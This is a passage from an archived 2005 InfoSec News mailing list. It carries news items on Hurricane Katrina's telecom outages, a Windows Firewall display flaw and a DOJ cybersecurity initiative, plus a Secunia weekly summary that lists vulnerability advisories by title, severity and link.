difficult, said Jeff Kagan, an independent telecommunications analyst in Atlanta. "All the carriers are still in survival mode," he said. "Some cities are better than others, but it is all one big mess. "I think it will be a long time before we can determine how each carrier is doing, but it will not be easy," Kagan said. "This is much worse than the 9/11 emergency. It is not just a part of a city like New York. It is the entire Southeast that has been devastated. "You have to be able to run repair trucks, but first you have to clear the streets," he continued. "Some areas can be repaired quickly, and other areas will take weeks and months. It is not pretty, but the carriers are working hard to get service back up and running." Only a small portion of a cellular call is carried over a wireless link, with cell sites usually connected to the rest of a network through T1 or fiber-optic connections, the spokesmen said. "Flooding has its most dramatic effect on land lines, such as T1s and fiber," said Verizon spokesman Patrick Kimball. "It's still a very difficult situation" in New Orleans. Where there is service, even in restored areas, network congestion is high, and land-line users have heard "all circuits are busy" or a fast busy signal, Bill Oliver, BellSouth's president of Lousiana operations, said in a statement. The wireless providers urged callers to use text messaging as an alternative to voice calls, partly because it requires less bandwidth. None of the carriers could predict when service will resume, but Oliver said "key fiber breaks" in southeastern Louisiana will take more resources to repair. Of about 1 million landline phones in Lousiana that were out of service after the deadly storm hit on Monday, only 130,000 have been restored so far, Oliver said. Various reports from New Orleans tell of desperate survivors offering to pay strangers to use a cell phone to reach family and friends. Meanwhile, a few companies in the Gulf Coast region set up communications backup plans in advance of Katrina, which has left hundreds, perhaps thousands, of people dead. For example, Siemens Enterprise Networks is working with a power utility in Mississippi that has been sending repair crews into the field with voice-over-Internet Protocol (VoIP) phones to make wireless calls via a satellite network, said Tim Perez, a Siemens director of sales. He wouldn't identify the utility, but said the system has been the main means of voice communications for utility crew supervisors in the field, supplemented by Research In Motion Ltd. BlackBerry handhelds for e-mail access. In this case, Siemens acted as integrator to arrange for satellite network bandwidth, allowing the users to connect to a Siemens IP-based voice switch in Atlanta. With the Siemens VoIP phones, the workers can make five-digit calls over a familiar device to co-workers without needing special codes for the satellite links, Perez said. "It provides business as close-to-usual under very unusual circumstances," he said. All of the wireless carriers in the region have supplied thousands of cell phones to be used by relief workers and emergency personnel. Even so, the cell phones are only as good as the network that supports them, said Jack Gold, an independent wireless industry analyst based in Westboro, Mass. "When stuff's under water, electrical stuff doesn't work," he said. "Fundamentally, you are still dealing with the laws of physics." Gold said emergency personnel and utility workers from hundreds of different groups face the same lack of radio interoperability with their private system emergency radios that has plagued police and fire departments for decades. The hurricane and the resulting flooding are another reminder that "we're not moving fast enough" to create emergency radio interoperability for responding to homeland security and natural disaster emergencies. "There's a lot of work to be done with radio interoperability, since we have 80 years of private radio networks as an installed base," he said. Gold noted that Austin and its suburbs, as well as some communities in California, are working together to find common radios. But most municipalities don't have the funds to abandon their systems. A number of small companies is offering portable mesh networks that work over Wi-Fi and can be driven to disasters on short notice to provide a common IP platform so utilities, police, fire and other officials have interoperable communications, Gold said. "One universal IP network would help, but how you coordinate that is the problem," he said. From isn at c4i.org Fri Sep 2 06:49:35 2005 From: isn at c4i.org (InfoSec News) Date: Fri Sep 2 06:54:00 2005 Subject: [ISN] Windows Firewall flaw may hide open ports Message-ID: http://news.com.com/Windows+Firewall+flaw+may+hide+open+ports/2100-7355_3-5845850.html By Joris Evers Staff Writer, CNET News.com September 1, 2005 A flaw in Windows Firewall may prevent users from seeing all the open network ports on a Windows XP or Windows Server 2003 computer. The flaw manifests itself in the way the security application handles some entries in the Windows Registry, Microsoft said in a security advisory published Wednesday. The Windows Registry stores PC settings and is a core part of the operating system. The bug could allow a firewall port to be open without the user being informed through the standard Windows Firewall user interface, according to the Microsoft advisory. The company has released a fix that can be downloaded from Microsoft's Web site and will be part of a future Windows service pack, the company said. Microsoft said the firewall issue is not a security vulnerability but said the flaw could be used by an attacker who already compromised a system in an attempt to hide exceptions in the firewall. Previous Next For example, miscreants who have penetrated a computer could create and hide a firewall exception by inserting a malformed Windows Firewall exception entry in the Windows Registry. "An attacker who already compromised the system would create such malformed registry entries with the intent to confuse a user," Microsoft said. Like other firewall software, Windows Firewall is meant to block incoming traffic to a computer. Users can allow incoming connections by creating exceptions. Windows Firewall displays these exceptions in the firewall UI, which can be reached by going to the Windows Control Panel and selecting Windows Firewall. PC users can view all firewall exceptions--including those the unpatched Windows Firewall doesn't see--through other tools, Microsoft notes. Typing "netsh firewall show state verbose = ENABLE" at a command prompt will display all active exceptions, the company said in its advisory. Copyright ?1995-2005 CNET Networks, Inc. From isn at c4i.org Fri Sep 2 06:50:39 2005 From: isn at c4i.org (InfoSec News) Date: Fri Sep 2 06:56:46 2005 Subject: [ISN] DOJ cybersecurity effort aims for Center of Excellence status Message-ID: http://www.gcn.com/vol1_no1/daily-updates/36875-1.html By Rob Thormeyer GCN Staff 09/01/05 The Justice Department will attempt to become a Center of Excellence for the Cybersecurity Line of Business initiative, a senior agency official said. Dennis Heretick, DOJ's chief information security officer and director of the agency's IT security staff, said yesterday at a workshop in Washington that the department will submit a business case to the Office of Management and Budget outlining how its Cyber Security Risk and Assessment and Management program could become a standard for federal agencies. Justice launched CSAM to document measures the agency takes to maintain the security of its IT systems, Heretick said, and he described it as similar to a Defense Department initiative. Heretick said Justice implemented "best practices" from the Transportation, State and Homeland Security departments, as well as the intelligence community. Heretick, speaking at an Information Security Report Card Symposium sponsored by the CIO Council, said the CSAM program also relied heavily on Justice's Certification and Accreditation client and TrustedAgent, a data-management program developed by Trusted Integration Inc. of Alexandria, Va., that streamlines and standardizes Federal Information Security Management Act information. "These tools provide online procedures, templates and subject-matter expert help instructions that allow us to emphasize implementing security versus spending on documenting security plans," Heretick said. The Cybersecurity Line of Business initiative is an effort by OMB to get a clear understanding of how much money federal agencies are spending on IT security. DOJ is one of a handful of agencies seeking to become a Center of Excellence; the other agencies were unknown at press time. From isn at c4i.org Fri Sep 2 06:49:48 2005 From: isn at c4i.org (InfoSec News) Date: Fri Sep 2 06:57:21 2005 Subject: [ISN] Secunia Weekly Summary - Issue: 2005-35 Message-ID: ======================================================================== The Secunia Weekly Advisory Summary 2005-08-25 - 2005-09-01 This week : 64 advisories ======================================================================== Table of Contents: 1.....................................................Word From Secunia 2....................................................This Week In Brief 3...............................This Weeks Top Ten Most Read Advisories 4.......................................Vulnerabilities Summary Listing 5.......................................Vulnerabilities Content Listing ======================================================================== 1) Word From Secunia: The Secunia staff is spending hours every day to assure you the best and most reliable source for vulnerability information. Every single vulnerability report is being validated and verified before a Secunia advisory is written. Secunia validates and verifies vulnerability reports in many different ways e.g. by downloading the software and performing comprehensive tests, by reviewing source code, or by validating the credibility of the source from which the vulnerability report was issued. As a result, Secunia's database is the most correct and complete source for recent vulnerability information available on the Internet. Secunia Online Vulnerability Database: http://secunia.com/ ======================================================================== 2) This Week in Brief: A vulnerability has been reported in mplayer, which potentially can be exploited by malicious people to compromise a vulnerable system. Additional details can be found in the referenced Secunia advisory below. Reference: http://secunia.com/SA16509 VIRUS ALERTS: Secunia has not issued any virus alerts during the week. ======================================================================== 3) This Weeks Top Ten Most Read Advisories: 1. [SA16560] Windows Registry Editor Utility String Concealment Weakness 2. [SA16105] Skype "skype_profile.jpg" Insecure Temporary File Creation 3. [SA16480] Microsoft DDS Library Shape Control Code Execution Vulnerability 4. [SA16466] Adobe Acrobat / Reader Plug-in Buffer Overflow Vulnerability 5. [SA16562] Symantec AntiVirus Corporate Edition / Client Security Privilege Escalation 6. [SA15601] Mozilla / Mozilla Firefox Frame Injection Vulnerability 7. [SA16559] Apache Byte-Range Filter Denial of Service Vulnerability 8. [SA12758] Microsoft Word Document Parsing Buffer Overflow Vulnerabilities 9. [SA16598] Simple PHP Blog Image File Upload Vulnerability 10. [SA16494] Linux Kernel Denial of Service and IPsec Policy Bypass ======================================================================== 4) Vulnerabilities Summary Listing Windows: [SA16629] BFCommand & Control Server Manager Multiple Vulnerabilities [SA16613] BNBT EasyTracker Denial of Service Vulnerability [SA16615] BlueWhaleCRM "Account ID" SQL Injection Vulnerability UNIX/Linux: [SA16637] Slackware update for gaim [SA16635] Slackware update for php [SA16631] Debian update for php4 [SA16628] Red Hat update for evolution [SA16621] Gentoo update for phpgroupware [SA16619] SUSE update for php4/php5 [SA16601] Fedora update for lesstif [SA16593] Gentoo update for phpwiki [SA16592] Fedora update for openmotif [SA16589] Fedora update for php [SA16576] Debian update for simpleproxy [SA16644] Avaya Multiple Ethereal Vulnerabilities [SA16638] Slackware update for pcre [SA16634] Debian update for kismet [SA16624] Debian update for pstotext [SA16618] SUSE update for pcre [SA16614] UMN Gopher "VIfromLine()" Buffer Overflow Vulnerability [SA16600] SqWebMail HTML Emails Script Insertion Vulnerability [SA16599] Mandriva update for gnumeric [SA16587] Gentoo update for libpcre [SA16584] Gnumeric PCRE Integer Overflow Vulnerability [SA16582] Mandriva update for bluez-utils [SA16581] Mandriva update for pcre [SA16580] Mandriva update for php [SA16575] Mandriva update for python [SA16574] Affix Device Name Shell Command Injection Vulnerability [SA16641] Avaya PDS HP-UX Unspecified Security Bypass Vulnerability [SA16643] Avaya gzip Directory Traversal Vulnerability [SA16636] Debian update for phpldapadmin [SA16622] Avaya Media Servers rsh Directory Traversal Vulnerability [SA16603] Ubuntu update for courier-base [SA16590] Fedora update for freeradius [SA16588] Debian update for libpam-ldap [SA16578] Astaro Security Linux Proxy Security Issue [SA16642] Avaya OpenSSL "der_chop" Script Insecure Temporary File Creation [SA16626] Gentoo update for lm_sensors [SA16610] Debian update for maildrop [SA16608] Fedora update for kernel [SA16591] Debian update for backup-manager [SA16586] HP-UX Veritas File System Security Bypass Vulnerability [SA16579] Mandriva update for lm_sensors [SA16606] Fedora update for ntp [SA16602] NTP Incorrect Group Permissions Security Issue Other: [SA16640] Novell NetWare CIFS Denial of Service Vulnerability Cross Platform: [SA16627] FUDforum Avatar Upload Vulnerability [SA16620] AutoLinks Pro "alpath" File Inclusion Vulnerability [SA16617] phpLDAPadmin welcome.php Arbitrary File Inclusion [SA16607] Looking Glass Cross-Site Scripting and Shell Command Injection [SA16585] Quake 2 Lithium II Mod Nickname Format String Vulnerability [SA16632] PHP-Fusion Nested BBcode "url" Script Insertion Vulnerability [SA16625] Cosmoshop Login SQL Injection Vulnerability [SA16623] Helpdesk software Hesk Authentication Bypass Vulnerability [SA16616] Simple PHP Blog comment_delete_cgi.php Arbitrary File Deletion [SA16612] FreeStyle Wiki Arbitrary Command Injection Vulnerability [SA16597] PhotoPost PHP Pro EXIF Data Script Insertion Vulnerability [SA16596] YaPig EXIF Data Script Insertion Vulnerability [SA16595] phpGraphy EXIF Data Script Insertion Vulnerability [SA16594] Gallery EXIF Data Script Insertion and File Disclosure Vulnerability [SA16611] phpLDAPadmin Anonymous Bind Security Bypass [SA16605] phpMyAdmin Two Cross-Site Scripting Vulnerabilities [SA16598] Simple PHP Blog Image File Upload Vulnerability ======================================================================== 5) Vulnerabilities Content Listing Windows:-- [SA16629] BFCommand & Control Server Manager Multiple Vulnerabilities Critical: Moderately critical Where: From remote Impact: Security Bypass Released: 2005-08-30 Luigi Auriemma has reported some vulnerabilities in BFCommand & Control Server Manager, which can be exploited by malicious people to bypass certain security restrictions or cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/16629/ -- [SA16613] BNBT EasyTracker Denial of Service Vulnerability Critical: Moderately critical Where: From remote Impact: DoS Released: 2005-08-30 Sowhat has discovered a vulnerability in BNBT EasyTracker, which can be exploited by malicious people to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/16613/ -- [SA16615] BlueWhaleCRM "Account ID" SQL Injection Vulnerability Critical: Less critical Where: From remote Impact: Manipulation of data Released: 2005-08-30 Kutbuddin Trunkwala has reported a vulnerability in BlueWhaleCRM, which can be exploited by malicious users to conduct SQL injection attacks. Full Advisory: http://secunia.com/advisories/16615/ UNIX/Linux:-- [SA16637] Slackware update for gaim Critical: Highly critical Where: From remote Impact: DoS, System access Released: 2005-08-31 Slackware has issued an update for gaim. This fixes a vulnerability and two weaknesses, which can be exploited by malicious people to cause a DoS (Denial of Service) or compromise a user's system. Full Advisory: http://secunia.com/advisories/16637/ -- [SA16635] Slackware update for php Critical: Highly critical Where: From remote Impact: System access Released: 2005-08-31 Slackware has issued an update for php. This fixes two vulnerabilities, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16635/ -- [SA16631] Debian update for php4 Critical: Highly critical Where: From remote Impact: Privilege escalation, System access Released: 2005-08-30 Debian has issued an update for php4. This fixes some vulnerabilities, which can be exploited by malicious, local users to perform certain actions with escalated privileges, or by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16631/ -- [SA16628] Red Hat update for evolution Critical: Highly critical Where: From remote Impact: System access Released: 2005-08-30 Red Hat has issued an update for evolution. This fixes some vulnerabilities, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16628/ -- [SA16621] Gentoo update for phpgroupware Critical: Highly critical Where: From remote Impact: Security Bypass, Cross Site Scripting, System access Released: 2005-08-31 Gentoo has issued an update for phpgroupware. This fixes some vulnerabilities, which can be exploited by malicious administrative users to conduct script insertion attacks, or by malicious people to bypass certain security restrictions or compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16621/ -- [SA16619] SUSE update for php4/php5 Critical: Highly critical Where: From remote Impact: DoS, System access Released: 2005-08-31 SUSE has issued updates for php4 and php5. These fix some vulnerabilities, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16619/ -- [SA16601] Fedora update for lesstif Critical: Highly critical Where: From remote Impact: DoS, System access Released: 2005-08-29 Fedora has issued an update for lesstif. This fixes multiple vulnerabilities, which can be exploited by malicious people to cause a DoS (Denial of Service) or potentially compromise a user's system. Full Advisory: http://secunia.com/advisories/16601/ -- [SA16593] Gentoo update for phpwiki Critical: Highly critical Where: From remote Impact: System access Released: 2005-08-26 Gentoo has issued an update for phpwiki. This fixes a vulnerability, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16593/ -- [SA16592] Fedora update for openmotif Critical: Highly critical Where: From remote Impact: System access Released: 2005-08-26 Fedora has issued an update for openmotif. This fixes a vulnerability, which potentially can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16592/ -- [SA16589] Fedora update for php Critical: Highly critical Where: From remote Impact: System access Released: 2005-08-26 Fedora has issued an update for php. This fixes a vulnerability, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16589/ -- [SA16576] Debian update for simpleproxy Critical: Highly critical Where: From remote Impact: System access Released: 2005-08-26 Debian has issued an update for simpleproxy. This fixes a vulnerability, which potentially can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16576/ -- [SA16644] Avaya Multiple Ethereal Vulnerabilities Critical: Moderately critical Where: From remote Impact: DoS, System access Released: 2005-08-31 Avaya has acknowledged some vulnerabilities in Ethereal included in some products, which can be exploited by malicious people to cause a DoS (Denial of Service) or compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16644/ -- [SA16638] Slackware update for pcre Critical: Moderately critical Where: From remote Impact: System access, DoS Released: 2005-08-31 Slackware has issued an update for pcre. This fixes a vulnerability, which potentially can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16638/ -- [SA16634] Debian update for kismet Critical: Moderately critical Where: From remote Impact: Unknown, System access Released: 2005-08-30 Debian has issued an update for Kismet. This fixes some vulnerabilities, which potentially can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16634/ -- [SA16624] Debian update for pstotext Critical: Moderately critical Where: From remote Impact: System access Released: 2005-09-01 Debian has issued an update for pstotext. This fixes a vulnerability, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16624/ -- [SA16618] SUSE update for pcre Critical: Moderately critical Where: From remote Impact: DoS, System access Released: 2005-08-31 SUSE has issued an update for pcre. This fixes a vulnerability, which potentially can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16618/ -- [SA16614] UMN Gopher "VIfromLine()" Buffer Overflow Vulnerability Critical: Moderately critical Where: From remote Impact: System access Released: 2005-08-30 vade79 has discovered a vulnerability in Gopher client, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16614/ -- [SA16600] SqWebMail HTML Emails Script Insertion Vulnerability Critical: Moderately critical Where: From remote Impact: Cross Site Scripting Released: 2005-08-29 Secunia Research has discovered a vulnerability in SqWebMail, which can be exploited by malicious people to conduct script insertion attacks. Full Advisory: http://secunia.com/advisories/16600/ -- [SA16599] Mandriva update for gnumeric Critical: Moderately critical Where: From remote Impact: DoS, System access Released: 2005-08-29 Mandriva has issued an update for gnumeric. This fixes a vulnerability, which potentially can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16599/ -- [SA16587] Gentoo update for libpcre Critical: Moderately critical Where: From remote Impact: System access Released: 2005-08-26 Gentoo has issued an update for libpcre. This fixes a vulnerability, which potentially can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16587/ -- [SA16584] Gnumeric PCRE Integer Overflow Vulnerability Critical: Moderately critical Where: From remote Impact: DoS, System access Released: 2005-08-29 A vulnerability has been reported in Gnumeric, which potentially can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16584/ -- [SA16582] Mandriva update for bluez-utils Critical: Moderately critical Where: From remote Impact: Security Bypass, System access Released: 2005-08-26 Mandriva has issued an update for bluez-utils. This fixes a vulnerability, which can be exploited by malicious people to bypass certain security restrictions or compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16582/ -- [SA16581] Mandriva update for pcre Critical: Moderately critical Where: From remote Impact: System access Released: 2005-08-26 Mandriva has issued an update for pcre. This fixes a vulnerability, which potentially can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16581/ -- [SA16580] Mandriva update for php Critical: Moderately critical Where: From remote Impact: System access Released: 2005-08-26 Mandriva has issued an update for php. This fixes a vulnerability, which potentially can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16580/ -- [SA16575] Mandriva update for python Critical: Moderately critical Where: From remote Impact: DoS, System access Released: 2005-08-29 Mandriva has issued an update for python. This fixes a vulnerability, which potentially can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16575/ -- [SA16574] Affix Device Name Shell Command Injection Vulnerability Critical: Moderately critical Where: From remote Impact: System access Released: 2005-08-29 Kevin Finisterre has reported a vulnerability in Affix, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16574/ -- [SA16641] Avaya PDS HP-UX Unspecified Security Bypass Vulnerability Critical: Moderately critical Where: From local network Impact: Security Bypass Released: 2005-08-31 Avaya has acknowledged a vulnerability in Avaya PDS (Predictive Dialing System), which potentially can be exploited by malicious people to bypass certain security restrictions. Full Advisory: http://secunia.com/advisories/16641/ -- [SA16643] Avaya gzip Directory Traversal Vulnerability Critical: Less critical Where: From remote Impact: Security Bypass, Manipulation of data Released: 2005-08-31 Avaya has acknowledged a vulnerability in gzip included in some products, which potentially can be exploited by malicious people to extract files to arbitrary directories on a user's system. Full Advisory: http://secunia.com/advisories/16643/ -- [SA16636] Debian update for phpldapadmin Critical: Less critical Where: From remote Impact: Security Bypass Released: 2005-08-30 Debian has issued an update for phpldapadmin. This fixes a security issue, which can be exploited by malicious people to bypass certain security restrictions. Full Advisory: http://secunia.com/advisories/16636/ -- [SA16622] Avaya Media Servers rsh Directory Traversal Vulnerability Critical: Less critical Where: From remote Impact: Manipulation of data Released: 2005-08-31 Avaya has acknowledged a vulnerability in rsh included in S8XXX Media Servers, which potentially can be exploited by malicious people to overwrite arbitrary files on a vulnerable system. Full Advisory: http://secunia.com/advisories/16622/ -- [SA16603] Ubuntu update for courier-base Critical: Less critical Where: From remote Impact: DoS Released: 2005-08-29 Ubuntu has issued an update for courier-base. This fixes a vulnerability, which potentially can be exploited by malicious people to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/16603/ -- [SA16590] Fedora update for freeradius Critical: Less critical Where: From remote Impact: Manipulation of data, DoS Released: 2005-08-26 Fedora has issued an update for freeradius. This fixes some vulnerabilities, which potentially can be exploited by malicious users to conduct SQL injection attacks or to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/16590/ -- [SA16588] Debian update for libpam-ldap Critical: Less critical Where: From remote Impact: Security Bypass Released: 2005-08-26 Debian has issued an update for libpam-ldap. This fixes a security issue, which can be exploited by malicious people to bypass certain security restrictions. Full Advisory: http://secunia.com/advisories/16588/ -- [SA16578] Astaro Security Linux Proxy Security Issue Critical: Less critical Where: From remote Impact: Security Bypass Released: 2005-08-29 Oliver Karow has reported a security issue in Astaro Secure Linux, which can be exploited by malicious people to bypass certain security restrictions. Full Advisory: http://secunia.com/advisories/16578/ -- [SA16642] Avaya OpenSSL "der_chop" Script Insecure Temporary File Creation Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2005-08-31 Avaya has acknowledged a vulnerability in openssl included in some products, which can be exploited by malicious, local users to perform certain actions on a vulnerable system with escalated privileges. Full Advisory: http://secunia.com/advisories/16642/ -- [SA16626] Gentoo update for lm_sensors Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2005-08-31 Gentoo has issued an update for lm_sensors. This fixes a vulnerability, which can be exploited by malicious, local users to perform certain actions on a vulnerable system with escalated privileges. Full Advisory: http://secunia.com/advisories/16626/ -- [SA16610] Debian update for maildrop Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2005-08-30 Debian has issued an update for maildrop. This fixes a security issue, which can be exploited by malicious, local users to gain escalated privileges. Full Advisory: http://secunia.com/advisories/16610/ -- [SA16608] Fedora update for kernel Critical: Less critical Where: Local system Impact: Security Bypass Released: 2005-08-29 Fedora has issued an update for the kernel. This fixes a vulnerability, which can be exploited by malicious, local users to bypass certain security restrictions. Full Advisory: http://secunia.com/advisories/16608/ -- [SA16591] Debian update for backup-manager Critical: Less critical Where: Local system Impact: Exposure of sensitive information, Privilege escalation Released: 2005-08-29 Debian has issued an update for backup-manager. This fixes two vulnerabilities, which potentially can be exploited by malicious, local users to disclose potentially sensitive information or perform certain actions on a vulnerable system with escalated privileges. Full Advisory: http://secunia.com/advisories/16591/ -- [SA16586] HP-UX Veritas File System Security Bypass Vulnerability Critical: Less critical Where: Local system Impact: Security Bypass Released: 2005-08-26 A vulnerability has been reported in HP-UX, which can be exploited by malicious, local users to bypass certain security restrictions. Full Advisory: http://secunia.com/advisories/16586/ -- [SA16579] Mandriva update for lm_sensors Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2005-08-26 Mandriva has issued an update for lm_sensors. This fixes a vulnerability, which can be exploited by malicious, local users to perform certain actions on a vulnerable system with escalated privileges. Full Advisory: http://secunia.com/advisories/16579/ -- [SA16606] Fedora update for ntp Critical: Not critical Where: Local system Impact: Privilege escalation Released: 2005-08-29 Fedora has issued an update for ntp. This fixes a security issue, which can cause ntpd to run with incorrect group permissions. Full Advisory: http://secunia.com/advisories/16606/ -- [SA16602] NTP Incorrect Group Permissions Security Issue Critical: Not critical Where: Local system Impact: Privilege escalation Released: 2005-08-29 Josh Bressers has reported a security issue in ntpd, which can cause ntpd to run with incorrect group permissions. Full Advisory: http://secunia.com/advisories/16602/ Other:-- [SA16640] Novell NetWare CIFS Denial of Service Vulnerability Critical: Less critical Where: From local network Impact: DoS Released: 2005-08-31 A vulnerability has been reported in NetWare, which can be exploited by malicious people to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/16640/ Cross Platform:-- [SA16627] FUDforum Avatar Upload Vulnerability Critical: Highly critical Where: From remote Impact: System access Released: 2005-08-30 riklaunim has discovered a vulnerability in FUDforum, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16627/ -- [SA16620] AutoLinks Pro "alpath" File Inclusion Vulnerability Critical: Highly critical Where: From remote Impact: System access Released: 2005-08-30 NewAngels Team and 4Degrees have reported a vulnerability in AutoLinks Pro, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16620/ -- [SA16617] phpLDAPadmin welcome.php Arbitrary File Inclusion Critical: Highly critical Where: From remote Impact: System access Released: 2005-08-30 rgod has discovered a vulnerability in phpLDAPadmin, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16617/ -- [SA16607] Looking Glass Cross-Site Scripting and Shell Command Injection Critical: Highly critical Where: From remote Impact: Cross Site Scripting, System access Released: 2005-08-29 rgod has discovered some vulnerabilities in Looking Glass, which can be exploited by malicious people to conduct cross-site scripting attacks and compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16607/ -- [SA16585] Quake 2 Lithium II Mod Nickname Format String Vulnerability Critical: Highly critical Where: From remote Impact: DoS, System access Released: 2005-08-29 SinNULL has reported a vulnerability in Lithium II Mod, which can be exploited by malicious people to cause a DoS (Denial of Service) or potentially compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16585/ -- [SA16632] PHP-Fusion Nested BBcode "url" Script Insertion Vulnerability Critical: Moderately critical Where: From remote Impact: Cross Site Scripting Released: 2005-08-30 slacker4ever_1 has discovered a vulnerability in PHP-Fusion, which can be exploited by malicious people to conduct script insertion attacks. Full Advisory: http://secunia.com/advisories/16632/ -- [SA16625] Cosmoshop Login SQL Injection Vulnerability Critical: Moderately critical Where: From remote Impact: Security Bypass, Manipulation of data, Exposure of sensitive information Released: 2005-08-30 l0om has reported a vulnerability in Cosmoshop, which can be exploited by malicious people to conduct SQL injection attacks and disclose sensitive information. Full Advisory: http://secunia.com/advisories/16625/ -- [SA16623] Helpdesk software Hesk Authentication Bypass Vulnerability Critical: Moderately critical Where: From remote Impact: Security Bypass Released: 2005-08-30 s2b has discovered a vulnerability in Helpdesk software Hesk, which can be exploited by malicious people to bypass certain security restrictions. Full Advisory: http://secunia.com/advisories/16623/ -- [SA16616] Simple PHP Blog comment_delete_cgi.php Arbitrary File Deletion Critical: Moderately critical Where: From remote Impact: Manipulation of data Released: 2005-08-30 Kenneth F. Belva has discovered a vulnerability in Simple PHP Blog, which can be exploited by malicious people to manipulate sensitive information. Full Advisory: http://secunia.com/advisories/16616/ -- [SA16612] FreeStyle Wiki Arbitrary Command Injection Vulnerability Critical: Moderately critical Where: From remote Impact: System access Released: 2005-08-30 A vulnerability has been reported in FreeStyle Wiki, which can be exploited by malicious users to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16612/ -- [SA16597] PhotoPost PHP Pro EXIF Data Script Insertion Vulnerability Critical: Moderately critical Where: From remote Impact: Cross Site Scripting Released: 2005-08-26 Cedric Cochin has reported a vulnerability in PhotoPost PHP Pro, which can be exploited by malicious people to conduct script insertion attacks. Full Advisory: http://secunia.com/advisories/16597/ -- [SA16596] YaPig EXIF Data Script Insertion Vulnerability Critical: Moderately critical Where: From remote Impact: Cross Site Scripting Released: 2005-08-26 Cedric Cochin has discovered a vulnerability in YaPig, which can be exploited by malicious people to conduct script insertion attacks. Full Advisory: http://secunia.com/advisories/16596/ -- [SA16595] phpGraphy EXIF Data Script Insertion Vulnerability Critical: Moderately critical Where: From remote Impact: Cross Site Scripting Released: 2005-08-26 Cedric Cochin has reported a vulnerability in phpGraphy, which can be exploited by malicious people to conduct script insertion attacks. Full Advisory: http://secunia.com/advisories/16595/ -- [SA16594] Gallery EXIF Data Script Insertion and File Disclosure Vulnerability Critical: Moderately critical Where: From remote Impact: Cross Site Scripting, Exposure of sensitive information Released: 2005-08-26 Two vulnerabilities have been reported in Gallery, which can be exploited by malicious people to conduct script insertion attacks or disclose certain sensitive information. Full Advisory: http://secunia.com/advisories/16594/ -- [SA16611] phpLDAPadmin Anonymous Bind Security Bypass Critical: Less critical Where: From remote Impact: Security Bypass Released: 2005-08-30 Alexander Gerasiov has reported a security issue in phpLDAPadmin, which can be exploited by malicious people to bypass certain security restrictions. Full Advisory: http://secunia.com/advisories/16611/ -- [SA16605] phpMyAdmin Two Cross-Site Scripting Vulnerabilities Critical: Less critical Where: From remote Impact: Cross Site Scripting Released: 2005-08-29 Some vulnerabilities have been reported in phpMyAdmin, which can be exploited by malicious people to conduct cross-site scripting attacks. Full Advisory: http://secunia.com/advisories/16605/ -- [SA16598] Simple PHP Blog Image File Upload Vulnerability Critical: Less critical Where: From remote Impact: System access Released: 2005-08-26 ReZEN and 0xception have discovered a vulnerability in Simple PHP Blog, which can be exploited by malicious users to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16598/ ======================================================================== Secunia recommends that you verify all advisories you receive, by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Subscribe: http://secunia.com/secunia_weekly_summary/ Contact details: Web : http://secunia.com/ E-mail : support@secunia.com Tel : +45 70 20 51 44 Fax : +45 70 20 51 45 From isn at c4i.org Fri Sep 2 06:50:27 2005 From: isn at c4i.org (InfoSec News) Date: Fri Sep 2 06:58:07 2005 Subject: [ISN] Flood Waters Can't Sink Net Link Message-ID: http://www.wired.com/news/planet/0,2782,68725,00.html By Joel Johnson Sept. 01, 2005 Despite the loss of most public utilities, at least one hosting company in hurricane-battered New Orleans is still online, fighting against time and the odds to keep part of the internet humming. Occupying the 10th floor of a downtown Big Easy office building, Zipa [1] is a typical web-hosting and co-location center, with one key difference: It's sitting smack dab in the middle of some of the worst devastation the United States has ever experienced. With buildings reduced to soggy ruin just a few blocks away, Zipa's data center -- built by Enron in its expansionist heyday -- still operates, powered by a 750-kilowatt diesel generator and connected to the rest of the world by a fiber optic connection buried deep underneath New Orleans' flooded streets. That makes the employees of Zipa and sister company DirectNIC [2], which is just upstairs, some of the only flood victims 